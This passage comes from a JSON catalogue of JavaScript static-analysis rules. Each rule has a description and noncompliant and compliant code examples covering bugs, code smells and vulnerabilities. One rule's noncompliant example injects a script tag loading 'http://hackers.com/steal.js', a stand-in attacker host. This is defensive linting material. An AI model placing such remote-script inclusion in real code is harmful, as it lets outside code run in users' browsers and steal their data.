If it is gratuitous\nbecause it does not match the programmer's intent, then it's a bug and the expression should be fixed.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\na = true;\nif (a) { \/\/ Noncompliant\n  doSomething();\n}\n\nif (b &amp;&amp; a) { \/\/ Noncompliant; \"a\" is always \"true\"\n  doSomething();\n}\n\nif (c || !a) { \/\/ Noncompliant; \"!a\" is always \"false\"\n  doSomething();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\na = true;\nif (foo(a)) {\n  doSomething();\n}\n\nif (b) {\n  doSomething();\n}\n\nif (c) {\n  doSomething();\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 13.7 - Boolean operations whose results are invariant shall not be permitted. <\/li>\n  <li> MISRA C:2012, 14.3 - Controlling expressions shall not be invariant <\/li>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/489\">MITRE, CWE-489<\/a> - Leftover Debug Code <\/li>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/571\">MITRE, CWE-571<\/a> - Expression is Always True <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n  executed <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2611","repo":"javascript","name":"Untrusted content should not be included","htmlDesc":"<p>Including content in your site from an untrusted source can expose your users to attackers and even compromise your own site. 
For that reason, this\nrule raises an issue for each non-relative URL.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction include(url) {\n  var s = document.createElement(\"script\");\n  s.setAttribute(\"type\", \"text\/javascript\");\n  s.setAttribute(\"src\", url);\n  document.body.appendChild(s);\n}\ninclude(\"http:\/\/hackers.com\/steal.js\")  \/\/ Noncompliant\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/829\">MITRE, CWE-829<\/a> - Inclusion of Functionality from Untrusted Control Sphere <\/li>\n  <li> <a href=\"http:\/\/www.sans.org\/top25-software-errors\/\">SANS Top 25<\/a> - Risky Resource Management <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[{"key":"domainsToIgnore","htmlDesc":"Comma-delimited list of domains to ignore. Regexes may be used, e.g. (.*\\.)?example.com,foo.org","type":"STRING"}],"type":"VULNERABILITY"},{"key":"javascript:S2688","repo":"javascript","name":"\"NaN\" should not be used in comparisons","htmlDesc":"<p><code>NaN<\/code> is not equal to anything, even itself. Testing for equality or inequality against <code>NaN<\/code> will yield predictable results,\nbut probably not the ones you want. <\/p>\n<p>Instead, the best way to see whether a variable is equal to <code>NaN<\/code> is to use <code>Number.isNaN()<\/code>, since ES2015, or (perhaps\ncounter-intuitively) to compare it to itself. 
Since <code>NaN !== NaN<\/code>, when <code>a !== a<\/code>, you know it must equal <code>NaN<\/code>.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar a = NaN;\n\nif (a === NaN) {  \/\/ Noncompliant; always false\n  console.log(\"a is not a number\");  \/\/ this is dead code\n}\nif (a !== NaN) { \/\/ Noncompliant; always true\n  console.log(\"a is not NaN\"); \/\/ this statement is not necessarily true\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (Number.isNaN(a)) {\n  console.log(\"a is not a number\");\n}\nif (!Number.isNaN(a)) {\n  console.log(\"a is not NaN\");\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/7AEqAQ\">CERT, NUM07-J.<\/a> - Do not attempt comparisons with NaN <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2692","repo":"javascript","name":"\"indexOf\" checks should not be for positive numbers","htmlDesc":"<p>Most checks against an <code>indexOf<\/code> call against a string or array compare it with -1 because 0 is a valid index. 
Any checks which look for\nvalues &gt; 0 ignore the first element, which is likely a bug.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar color = \"blue\";\nvar name = \"ishmael\";\nvar number = 123;\n\nvar arr = [color, name];\n\nif (arr.indexOf(\"blue\") &gt; 0) { \/\/ Noncompliant\n  \/\/ ...\n}\nif (arr[0].indexOf(\"ish\") &gt; 0) { \/\/ Noncompliant\n  \/\/ ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar color = \"blue\";\nvar name = \"ishmael\";\nvar number = 123;\n\nvar arr = [color, name];\n\nif (arr.indexOf(\"blue\") &gt;= 0) {\n  \/\/ ...\n}\nif (arr[0].indexOf(\"ish\") &gt; -1) {\n  \/\/ ...\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2714","repo":"javascript","name":"Element type selectors should not be used with class selectors","htmlDesc":"<p>Using element type in class selectors is slower than using only the class selector.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar $products = $(\"div.products\");    \/\/ Noncompliant - slow\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar $products = $(\".products\");    \/\/ Compliant - fast\n<\/pre>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2715","repo":"javascript","name":"\"find\" should be used to select the children of an element known by id","htmlDesc":"<p>The use of <code>find<\/code> allows <code>document.getElementById()<\/code> to be used for the top-level selection, and saves the jQuery Sizzle\nengine for where it's really needed. 
That makes the query faster, and your application more responsive.<\/p>\n<p>From the jQuery documentation:<\/p>\n<blockquote>\n  <p>Beginning your selector with an ID is always best.<\/p>\n  <p>The <code>.find()<\/code> approach is faster because the first selection is handled without going through the Sizzle selector engine \u2013 ID-only\n  selections are handled using <code>document.getElementById()<\/code>, which is extremely fast because it is native to the browser.<\/p>\n<\/blockquote>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar $productIds = $(\"#products div.id\"); \/\/ Noncompliant - a nested query for Sizzle selector engine\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar $productIds = $(\"#products\").find(\"div.id\"); \/\/ Compliant - #products is already selected by document.getElementById() so only div.id needs to go through Sizzle selector engine\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2757","repo":"javascript","name":"\"=+\" should not be used instead of \"+=\"","htmlDesc":"<p>The use of operators pairs (<code>=+<\/code> or <code>=-<\/code>) where the reversed, single operator was meant (<code>+=<\/code> or <code>-=<\/code>)\nwill compile and run, but not produce the expected results.<\/p>\n<p>This rule raises an issue when <code>=+<\/code> and <code>=-<\/code> are used without any space between the two operators and when there is at least\none whitespace after.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar target =-5;\nvar num = 3;\n\ntarget =- num;  \/\/ Noncompliant; target = -3. 
Is that really what's meant?\ntarget =+ num; \/\/ Noncompliant; target = 3\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar target = -5;\nvar num = 3;\n\ntarget = -num;  \/\/ Compliant; intent to assign inverse value of num is clear\ntarget += num;\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2770","repo":"javascript","name":"Deprecated jQuery methods should not be used","htmlDesc":"<p>Deprecation is a warning that a method has been superseded, and will eventually be removed. The deprecation period allows you to make a smooth\ntransition away from the aging, soon-to-be-retired technology.<\/p>\n<p>This rule raises an issue when any of the following methods is used:<\/p>\n<ul>\n  <li> <code>.andSelf()<\/code> <\/li>\n  <li> <code>.context<\/code> <\/li>\n  <li> <code>.die()<\/code> <\/li>\n  <li> <code>.error()<\/code> <\/li>\n  <li> <code>jQuery.boxModel<\/code> <\/li>\n  <li> <code>jQuery.browser<\/code> <\/li>\n  <li> <code>jQuery.sub()<\/code> <\/li>\n  <li> <code>jQuery.support<\/code> <\/li>\n  <li> <code>.live()<\/code> <\/li>\n  <li> <code>.load()<\/code> <\/li>\n  <li> <code>.selector<\/code> <\/li>\n  <li> <code>.size()<\/code> <\/li>\n  <li> <code>.toggle()<\/code> <\/li>\n  <li> <code>.unload()<\/code> <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2817","repo":"javascript","name":"Web SQL databases should not be used","htmlDesc":"<p>The Web SQL Database standard never saw the light of day. It was first formulated, then deprecated by the W3C and was only implemented in some\nbrowsers. 
(It is not supported in Firefox or IE.)<\/p>\n<p>Further, the use of a Web SQL Database poses security concerns, since you only need its name to access such a database.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar db = window.openDatabase(\"myDb\", \"1.0\", \"Personal secrets stored here\", 2*1024*1024);  \/\/ Noncompliant\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A6-Sensitive_Data_Exposure\">OWASP Top Ten 2013 Category A6<\/a> - Sensitive Data Exposure\n  <\/li>\n  <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A9-Using_Components_with_Known_Vulnerabilities\">OWASP Top Ten 2013 Category A9<\/a> - Using\n  Components with Known Vulnerabilities <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"VULNERABILITY"},{"key":"javascript:S2819","repo":"javascript","name":"Cross-document messaging domains should be carefully restricted","htmlDesc":"<p>HTML5 adds the ability to send messages to documents served from other domains. 
According to the specification:<\/p>\n<blockquote>\n  Authors should not use the wildcard keyword (\n  <code>*<\/code>) in the\n  <code>targetOrigin<\/code> argument in messages that contain any confidential information, as otherwise there is no way to guarantee that the message\n  is only delivered to the recipient to which it was intended.\n<\/blockquote>\n<p>To mitigate the risk of sending sensitive information to a document served from a hostile or unknown domain, this rule raises an issue each time\n<code>Window.postMessage<\/code> is used.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar myWindow = document.getElementById('myIFrame').contentWindow;\nmyWindow.postMessage(message, \"*\"); \/\/ Noncompliant; how do you know what you loaded in 'myIFrame' is still there?\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A3-Cross-Site_Scripting_(XSS)\">OWASP Top Ten 2013 Category A3<\/a> - Cross-Site Scripting\n  (XSS) <\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"VULNERABILITY"},{"key":"javascript:S2870","repo":"javascript","name":"\"delete\" should not be used on arrays","htmlDesc":"<p>The <code>delete<\/code> operator can be used to remove a property from any object. Arrays are objects, so the <code>delete<\/code> operator can be\nused here too, but if it is, a hole will be left in the array because the indexes\/keys won't be shifted to reflect the deletion. 
<\/p>\n<p>The proper methods for removing an element at a certain index are:<\/p>\n<ul>\n  <li> <code>Array.prototype.splice<\/code> - add\/remove elements anywhere in the array <\/li>\n  <li> <code>Array.prototype.pop<\/code> - remove the element at the end of the array <\/li>\n  <li> <code>Array.prototype.shift<\/code> - remove the element at the beginning of the array <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar myArray = ['a', 'b', 'c', 'd'];\n\ndelete myArray[2];  \/\/ Noncompliant. myArray =&gt; ['a', 'b', undefined, 'd']\nconsole.log(myArray[2]); \/\/ expected value was 'd' but output is undefined\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar myArray = ['a', 'b', 'c', 'd'];\n\n\/\/ removes 1 element from index 2\nvar removed = myArray.splice(2, 1);  \/\/ myArray =&gt; ['a', 'b', 'd']\nconsole.log(myArray[2]); \/\/ outputs 'd'\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2873","repo":"javascript","name":"Calls should not be made to non-callable values","htmlDesc":"<p>The fact that JavaScript is not a strongly typed language allows developers a lot of freedom, but that freedom can be dangerous if you go too far\nwith it. <\/p>\n<p>Specifically, it is syntactically acceptable to invoke any expression as though its value were a function. 
But a <code>TypeError<\/code> may be\nraised if you do.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfoo = 1;\nfoo();   \/\/ Noncompliant; TypeError\n\nfoo = undefined;\nfoo();  \/\/ Noncompliant; TypeError\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2898","repo":"javascript","name":"\"[type=...]\" should be used to select elements by type","htmlDesc":"<p>While <code>:&lt;element_type&gt;<\/code> and <code>[type=\"&lt;element_type&gt;\"]<\/code> can both be used in jQuery to select elements by their\ntype, <code>[type=\"&lt;element_type&gt;\"]<\/code> is far faster because it can take advantage of the native DOM <code>querySelectorAll()<\/code> method\nin modern browsers. <\/p>\n<p>This rule raises an issue when following selectors are used:<\/p>\n<ul>\n  <li> <code>:checkbox<\/code> <\/li>\n  <li> <code>:file<\/code> <\/li>\n  <li> <code>:image<\/code> <\/li>\n  <li> <code>:password<\/code> <\/li>\n  <li> <code>:radio<\/code> <\/li>\n  <li> <code>:reset<\/code> <\/li>\n  <li> <code>:text<\/code> <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar input = $( \"form input:radio\" ); \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar input = $( \"form input[type=radio]\" ); \/\/ Compliant\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2990","repo":"javascript","name":"The global \"this\" object should not be used","htmlDesc":"<p>When the keyword <code>this<\/code> is used outside of an object, it refers to the global <code>this<\/code> object, which is the same thing as the\n<code>window<\/code> object in a standard web page. This could be confusing to maintainers. 
Instead, simply drop the <code>this<\/code>, or replace it\nwith <code>window<\/code>; it will have the same effect and be more readable.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nthis.foo = 1;   \/\/ Noncompliant\nconsole.log(this.foo); \/\/ Noncompliant\n\nfunction MyObj() {\n  this.foo = 1; \/\/ Compliant\n}\n\nMyObj.func1 = function() {\n  if (this.foo == 1) { \/\/ Compliant\n    \/\/ ...\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfoo = 1;\nconsole.log(foo);\n\nfunction MyObj() {\n  this.foo = 1;\n}\n\nMyObj.func1 = function() {\n  if (this.foo == 1) {\n    \/\/ ...\n  }\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2999","repo":"javascript","name":"\"new\" operators should be used with functions","htmlDesc":"<p>The <code>new<\/code> keyword should only be used with objects that define a constructor function. Use it with anything else, and you'll get a\n<code>TypeError<\/code> because there won't be a constructor function for the <code>new<\/code> keyword to invoke.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction MyClass() {\n  this.foo = 'bar';\n}\n\nvar someClass = 1;\n\nvar obj1 = new someClass;    \/\/ Noncompliant;\nvar obj2 = new MyClass();    \/\/ Noncompliant if considerJSDoc parameter set to true. 
Compliant when considerJSDoc=false\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n\/**\n * @constructor\n *\/\nfunction MyClass() {\n  this.foo = 'bar';\n}\n\nvar someClass = function(){\n  this.prop = 1;\n}\n\nvar obj1 = new someClass;  \/\/ Compliant\nvar obj2 = new MyClass();  \/\/ Compliant regardless of considerJSDoc value\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[{"key":"considerJSDoc","htmlDesc":"Consider only functions with @constructor tag as constructor functions","defaultValue":"false","type":"BOOLEAN"}],"type":"BUG"},{"key":"javascript:S3001","repo":"javascript","name":"\"delete\" should be used only with object properties","htmlDesc":"<p>The semantics of the <code>delete<\/code> operator are a bit tricky, and it can only be reliably used to remove properties from objects. Pass\nanything else to it, and you may or may not get the desired result.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar x  = 1;\ndelete x;       \/\/ Noncompliant\n\nfunction foo(){\n..\n}\n\ndelete foo;  \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar obj = {\n  x:1,\n  foo: function(){\n  ...\n  }\n};\ndelete obj.x;\ndelete obj.foo;\n\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3358","repo":"javascript","name":"Ternary operators should not be nested","htmlDesc":"<p>Just because you <em>can<\/em> do something, doesn't mean you should, and that's the case with nested ternary operations. Nesting ternary operators\nresults in the kind of code that may seem clear as day when you write it, but six months later will leave maintainers (or worse - future you)\nscratching their heads and cursing.<\/p>\n<p>Instead, err on the side of clarity, and use another line to express the nested operation as a separate statement.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\npublic String getTitle(Person p) {\n\n  return p.gender==Person.MALE?\"Mr. 
\":p.isMarried()?\"Mrs. \":\"Miss \" + p.getLastName();  \/\/ Noncompliant\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n\n  String honorific = p.isMarried()?\"Mrs. \":\"Miss \";\n  return p.gender==Person.MALE?\"Mr. \": honorific + p.getLastName();\n<\/pre>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3500","repo":"javascript","name":"Attempts should not be made to update \"const\" variables","htmlDesc":"<p>Variables declared with <code>const<\/code> cannot be modified. Unfortunately, attempts to do so don't always raise an error; in a non-ES2015\nenvironment, such an attempt might simply be ignored.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nconst pi = \"yes, please\";\npi = 3.14;  \/\/ Noncompliant\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3509","repo":"javascript","name":"Default parameters should not cause side effects","htmlDesc":"<p>The assignment of default parameter values is generally intended to help the caller. But when a default assignment causes side effects, the caller\nmay not be aware of the extra changes or may not fully understand their implications. I.e. default assignments with side effects may end up hurting\nthe caller, and for that reason, they should be avoided.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar count = 0;\n\nfunction go(i = count++) {  \/\/ Noncompliant\n  console.log(i);\n}\n\ngo();  \/\/ outputs 0\ngo(7); \/\/ outputs 7\ngo();  \/\/ outputs 1\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3513","repo":"javascript","name":"\"arguments\" should not be accessed directly","htmlDesc":"<p>The magic of JavaScript is that you can pass arguments to functions that don't declare parameters, and on the other side, you can use those\npassed-in arguments inside the no-args <code>function<\/code>. 
<\/p>\n<p>But just because you can, that doesn't mean you should. The expectation and use of arguments inside functions that don't explicitly declare them is\nconfusing to callers. No one should ever have to read and fully understand a function to be able to use it competently. <\/p>\n<p>If you don't want to name arguments explicitly, use the <code>...<\/code> syntax to specify that a variable number of arguments is expected. Then\ninside the function, you'll be dealing with a first-class array, rather than an array-like structure.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction concatenate() {\n  let args = Array.prototype.slice.call(arguments);  \/\/ Noncompliant\n  return args.join(', ');\n}\n\nfunction doSomething(isTrue) {\n  var args = Array.prototype.slice.call(arguments, 1); \/\/ Noncompliant\n  if (!isTrue) {\n    for (var arg of args) {\n      ...\n    }\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction concatenate(...args) {\n  return args.join(', ');\n}\n\nfunction doSomething(isTrue, ...values) {\n  if (!isTrue) {\n    for (var value of values) {\n      ...\n    }\n  }\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3514","repo":"javascript","name":"Destructuring syntax should be used for assignments","htmlDesc":"<p>ECMAScript 2015 introduced the ability to extract and assign multiple data points from an object or array simultaneously. This is called\n\"destructuring\", and it allows you to condense boilerplate code so you can concentrate on logic. 
<\/p>\n<p>This rule raises an issue when multiple pieces of data are extracted out of the same object or array and assigned to variables.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction foo (obj1, obj2, array) {\n  var a = obj1.a;  \/\/ Noncompliant\n  var b = obj1.b;\n\n  var name = obj2.name;  \/\/ ignored; there's only one extraction-and-assignment\n\n  var zero = array[0];  \/\/ Noncompliant\n  var one = array[1];\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction foo (obj1, obj2, array) {\n  var {a, b} = obj1;\n\n  var {name} = obj2;  \/\/ this syntax works because var name and property name are the same\n\n  var [zero, one] = array;\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3516","repo":"javascript","name":"Function returns should not be invariant","htmlDesc":"<p>When a function is designed to return an invariant value, it may be poor design, but it shouldn't adversely affect the outcome of your program.\nHowever, when it happens on all paths through the logic, it is likely a mistake.<\/p>\n<p>This rule raises an issue when a function contains several <code>return<\/code> statements that all return the same value.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction foo(a) {  \/\/ Noncompliant\n  let b = 12;\n  if (a) {\n    return b;\n  }\n  return b;\n}\n<\/pre>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3523","repo":"javascript","name":"Function constructors should not be used","htmlDesc":"<p>In addition to being obtuse from a syntax perspective, function constructors are also dangerous: their execution evaluates the constructor's string\narguments similar to the way <code>eval<\/code> works, which could expose your program to random, unintended code which can be both slow and a security\nrisk.<\/p>\n<p>In general it is better to avoid it altogether, particularly when used to parse 
JSON data. You should use ECMAScript 5's built-in JSON functions or\na dedicated library.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar obj =  new Function(\"return \" + data)();  \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar obj = JSON.parse(data);\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Function calls where the argument is a string literal (e.g. <code>(Function('return this'))()<\/code>) are ignored. <\/p>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"VULNERABILITY"},{"key":"javascript:S3524","repo":"javascript","name":"Braces and parentheses should be used consistently with arrow functions","htmlDesc":"<p>Shared coding conventions allow teams to collaborate effectively. This rule raises an issue when the use of parentheses with an arrow function does\nnot conform to the configured requirements.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the configured defaults forbidding parentheses<\/p>\n<pre>\nvar foo = (a) =&gt; { \/* ... *\/ };  \/\/ Noncompliant; remove parens from arg\nvar bar = (a, b) =&gt; { return 0; };  \/\/ Noncompliant; remove curly braces from body\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar foo = a =&gt; { \/* ... *\/ };\nvar bar = (a, b) =&gt; 0;\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[{"key":"body_braces","htmlDesc":"True to require curly braces around function body. False to forbid them for single-return bodies.","defaultValue":"false","type":"BOOLEAN"},{"key":"parameter_parens","htmlDesc":"True to require parentheses around parameters. 
False to forbid them for single parameter.","defaultValue":"false","type":"BOOLEAN"}],"type":"CODE_SMELL"},{"key":"javascript:S3525","repo":"javascript","name":"Class methods should be used instead of \"prototype\" assignments","htmlDesc":"<p>Originally JavaScript didn't support <code>class<\/code>es, and class-like behavior had to be kludged using things like <code>prototype<\/code>\nassignments for \"class\" functions. Fortunately, ECMAScript 2015 added classes, so any lingering <code>prototype<\/code> uses should be converted to\ntrue <code>class<\/code>es. The new syntax is more expressive and clearer, especially to those with experience in other languages.<\/p>\n<p>Specifically, with ES2015, you should simply declare a <code>class<\/code> and define its methods inside the class declaration.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction MyNonClass(initializerArgs = []) {\n  this._values = [...initializerArgs];\n}\n\nMyNonClass.prototype.doSomething = function () {  \/\/ Noncompliant\n  \/\/ ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass MyClass {\n  constructor(initializerArgs = []) {\n    this._values = [...initializerArgs];\n  }\n\n  doSomething() {\n    \/\/...\n  }\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3533","repo":"javascript","name":"\"import\" should be used to include external code","htmlDesc":"<p>Before ECMAScript 2015, module management had to be ad-hoc or provided by 3rd-party libraries such as Node.js, Webpack, or RequireJS. 
Fortunately,\nES2015, provides language-standard mechanisms for module management, <code>import<\/code> and <code>export<\/code>, and older usages should be\nconverted.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n\/\/ circle.js\nexports.area = function (r) {\n  return PI * r * r;\n};\n\n\/\/ foo.js\ndefine([\".\/cart\", \".\/horse\"], function(cart, horse) {  \/\/ Noncompliant\n  \/\/ ...\n});\n\n\/\/ bar.js\nconst circle = require('.\/circle.js');  \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n\/\/ circle.js\nlet area = function (r) {\n  return PI * r * r;\n}\nexport default area;\n\n\/\/ foo.js\nimport cart from \".\/cart.js\";\nimport horse from \".\/horse.js\";\n\n\/\/ bar.js\nimport circle from \".\/circle.js\"\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3579","repo":"javascript","name":"Array indexes should be numeric","htmlDesc":"<p>JavaScript is flexible enough to allow you to store values in an array with either numeric or named indexes. That is, it supports associative\narrays. But creating and populating an object in JavaScript is just as easy as an array, and more reliable if you need named members.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nlet arr = [];\narr[0] = 'a';\narr['name'] = 'bob';  \/\/ Noncompliant\narr[1] = 'foo';\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nlet obj = {\n  name: 'bob',\n  arr: ['a', 'foo']\n};\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3616","repo":"javascript","name":"Comma and logical OR operators should not be used in switch cases","htmlDesc":"<p>The comma operator (<code>,<\/code>) evaluates its operands, from left to right, and returns the second one. That's useful in some situations, but\njust wrong in a <code>switch<\/code> <code>case<\/code>. 
You may think you're compactly handling multiple values in the case, but only the last one in\nthe comma-list will ever be handled. The rest will fall through to the default.<\/p>\n<p>Similarly, the logical OR operator (<code>||<\/code>) will not work in a <code>switch<\/code> <code>case<\/code> either; only the first operand will be\nconsidered at execution time.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch (a) {\n  case 1,2:  \/\/ Noncompliant; only 2 is ever handled by this case\n    doTheThing(a);\n  case 3 || 4: \/\/ Noncompliant; only '3' is handled\n    doThatThing(a);\n  case 5:\n    doTheOtherThing(a);\n  default:\n    console.log(\"Neener, neener!\");  \/\/ this happens when a==1 or a == 4\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nswitch (a) {\n  case 1:\n  case 2:\n    doTheThing(a);\n  case 3:\n  case 4:\n    doThatThing(a);\n  case 5:\n    doTheOtherThing(a);\n  default:\n    console.log(\"Neener, neener!\");\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3686","repo":"javascript","name":"Functions should not be called both with and without \"new\"","htmlDesc":"<p>Constructor functions, which create new object instances, must only be called with <code>new<\/code>. Non-constructor functions must not. Mixing\nthese two usages could lead to unexpected results at runtime.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction getNum() {\n  return 5;\n}\n\nfunction Num(numeric, alphabetic) {\n  this.numeric = numeric;\n  this.alphabetic = alphabetic;\n}\n\nvar myFirstNum = getNum();\nvar my2ndNum = new getNum();  \/\/ Noncompliant. An empty object is returned, NOT 5\n\nvar myNumObj1 = new Num();\nvar myNumObj2 = Num();  \/\/ Noncompliant. 
undefined is returned, NOT an object\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3699","repo":"javascript","name":"The output of functions that don't return anything should not be used","htmlDesc":"<p>If a function does not return anything, it makes no sense to use its output. Specifically, passing it to another function, or assigning its\n\"result\" to a variable is probably a bug because such functions return <code>undefined<\/code>, which is probably not what was intended.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction foo() {\n}\n\na = foo();\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction foo() {\n}\n\nfoo();\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3735","repo":"javascript","name":"\"void\" should not be used","htmlDesc":"<p>The <code>void<\/code> operator evaluates its argument and unconditionally returns <code>undefined<\/code>. It can be useful in pre-ECMAScript 5\nenvironments, where <code>undefined<\/code> could be reassigned, but generally, its use makes code harder to understand.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvoid (function() {\n   ...\n}());\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n(function() {\n   ...\n}());\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>No issue is raised when <code>void 0<\/code> is used in place of <code>undefined<\/code>. 